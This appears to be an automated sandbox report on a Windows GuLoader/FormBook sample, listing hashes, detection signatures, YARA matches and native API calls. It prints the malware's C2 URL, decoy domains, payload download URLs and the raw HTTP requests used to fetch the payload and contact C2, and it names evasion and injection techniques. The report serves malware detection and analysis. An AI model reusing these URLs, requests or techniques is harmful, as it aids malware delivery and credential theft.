Windows Analysis Report RYATPPETU.exe

Overview

General Information

Sample Name: RYATPPETU.exe
Analysis ID: 510462
MD5: 7a4b8b634d2e94cd1e458af5918be3aa
SHA1: b6989ba569206ab6527aff0f8bd3278371ef7953
SHA256: 056477676a6b327511c22c10e77e4e5f3653b40528109d7715a9e9efffb4d068
Tags: exe, GuLoader

Detection

GuLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.lrbounee.xyz/kb8y/"], "decoy": ["kurdestates.com", "jojoinu.site", "humanblossoms.com", "pnmingyue.com", "breathewellductcleaning.com", "2631blg.xyz", "growwithgardiner.net", "dirtyfrenchdubai.com", "atlynnmusic.online", "vongquayfreefire247.com", "tafzba064.xyz", "realdealtrujillo.com", "liveartexperiences.com", "saimashafique.com", "istanbulmasajreklam.xyz", "fhwy6.com", "tecladistaemfoco.com", "libertyshelly.com", "raduanis.com", "hairshop-wave.com", "waytubeissue.top", "taurustwinscreation.com", "pashtointl.com", "yourfacedesigns.com", "elitbahistv9.com", "cerveceriachapultepectx.com", "vitalingredientsforliving.com", "wezdum.xyz", "matyherbs.com", "beffr.xyz", "mobilenftexchange.com", "tucsonpoolsservices.com", "sn-699.com", "quintasenalquiler.com", "radyometre.com", "victoryinthemaking.com", "stocolour.com", "social-data-company.com", "supportudc.xyz", "larrythecat.net", "candlessenceuk.com", "luciusbullens.com", "indianaexoticshop.com", "punkjoin.com", "effectivetherapeutics.com", "xybernft.com", "enaturism.xyz", "battlegroundbuzz.com", "bookseparat.com", "pepsicoinvest.xyz", "techexpertacademy.com", "yapbicicek.xyz", "kawaii-to-the-core.com", "afterthesethings.com", "inboxboree.com", "brooklyngats.com", "kc1628.com", "gfooveed.xyz", "sarabicompany.com", "emtreeconsulting.com", "chandcollege.com", "revolutiongaming.xyz", "babyunspillabowls.com", "etr6safvu8.com"]}
Source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://blumeconstructionllc.com/bin_NX"}
Multi AV Scanner detection for submitted file
Source: RYATPPETU.exe Virustotal: Detection: 31%
Source: RYATPPETU.exe ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: RYATPPETU.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 15.2.cmmon32.exe.549f840.4.unpack Avira: Label: TR/Dropper.Gen
Source: 15.2.cmmon32.exe.3254318.1.unpack Avira: Label: TR/Dropper.Gen
Source: 0.2.RYATPPETU.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.2.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.3.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RYATPPETU.exe.400000.1.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.RYATPPETU.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen

Compliance:

Uses 32bit PE files
Source: RYATPPETU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2
Source: Binary string: cmmon32.pdb source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: RYATPPETU.exe, 00000008.00000002.613082697.0000000000110000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: RYATPPETU.exe, 00000008.00000002.617058493.000000001E76F000.00000040.00000001.sdmp, cmmon32.exe, 0000000F.00000002.771684624.0000000004F70000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RYATPPETU.exe, cmmon32.exe

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop ebx 15_2_02EE7B1B

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.etr6safvu8.com
Source: C:\Windows\explorer.exe Domain query: www.lrbounee.xyz
Source: C:\Windows\explorer.exe Network Connect: 172.67.161.80 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.lrbounee.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lrbounee.xyz/kb8y/
Source: Malware configuration extractor URLs: https://blumeconstructionllc.com/bin_NX
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1
    Host: www.lrbounee.xyz
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /bin_NXOEaeagUq10.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: blumeconstructionllc.com
    Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 27 Oct 2021 18:18:51 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qqJ2Q9iCH1RRBQKJHt7%2Bpll1gj8DBHVrUY1%2ByxZfQWtFIoZbTjROcASUpSCa3xt1a89lPkmS%2FOwrIt5r%2Btdm6auT0AZrk%2Fg7h%2BdIwpX%2BPk3RXDFVKvodDvIcTZiBaHT4Vg1K"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6a4dede68e4e4ee6-FRA
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    Data Raw: 39 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
    Data Ascii: 9f<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.15.8.3</center></body></html>
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp String found in binary or memory: https://blumeconstructionllc.com/bin_NXOEaeagUq10.binhttps://soleprotect.de/bin_NXOEaeagUq10.bin
Source: RYATPPETU.exe, 00000008.00000002.613498629.00000000022C0000.00000004.00000001.sdmp String found in binary or memory: https://soleprotect.de/bin_NXOEaeagUq10.bin
Source: unknown DNS traffic detected: queries for: blumeconstructionllc.com
Source: global traffic HTTP traffic detected:
    GET /bin_NXOEaeagUq10.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: blumeconstructionllc.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /kb8y/?UL30vp=VG0y4HVkQ1AGt1voBcUsNCEJrT9SlfHUi22gJvk+aIOz4uPxc1TzHkPIPjpZ8++2gXXO&4hP=NPuDZXp0DVz HTTP/1.1
    Host: www.lrbounee.xyz
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: unknown HTTPS traffic detected: 45.82.177.176:443 -> 192.168.2.5:49697 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: RYATPPETU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.770057467.0000000003254000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.770207559.0000000003370000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BB270
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C16C5
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C1A07
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BF407
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BB81C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B8648
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C005C
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C0689
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B9095
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B373D
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BE7B8
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022B8BC8
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E696E30
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6AEBB0
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E731002
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E68B090
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E741D55
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E670D20
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E694120
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E67F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05062D07
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05061D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAB090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FA841F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05051002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FAD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FC2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050620A8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F90D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB4120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04F9F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05062B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FB6E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05061FF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FCEBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_050622AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_05062EF7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFEBAB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFE1BB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFD6F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFEECA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE9E4B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE9E50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE2D87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EE2D90
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_02EFDD62
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04F9B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022BB270 NtWriteVirtualMemory,NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 0_2_022C10AF NtProtectVirtualMemory
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9650 NtQueryValueKey
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A10 NtQuerySection
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B96D0 NtCreateKey
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9760 NtOpenProcess
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9770 NtSetInformationFile
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BA770 NtOpenThread
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9B00 NtSetValueKey
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9FE0 NtCreateMutant
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BB040 NtSuspendThread
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9820 NtEnumerateKey
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9560 NtWriteFile
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9950 NtQueueApcThread
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6BAD30 NtSetContextThread
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\RYATPPETU.exe Code function: 8_2_1E6B95D0 NtClose
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 15_2_04FD95D0 NtClose,LdrInitializeThunk
